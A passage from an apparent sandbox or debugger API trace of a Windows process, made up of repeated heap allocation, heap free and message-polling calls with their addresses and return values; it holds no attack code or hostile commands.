lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.968] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed268 | out: hHeap=0x770000) returned 1 [0026.968] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.968] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2c8 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4d8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.969] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed268 [0026.969] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.970] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.971] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.971] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.971] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.972] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.972] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.972] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.972] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.972] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.972] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.973] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 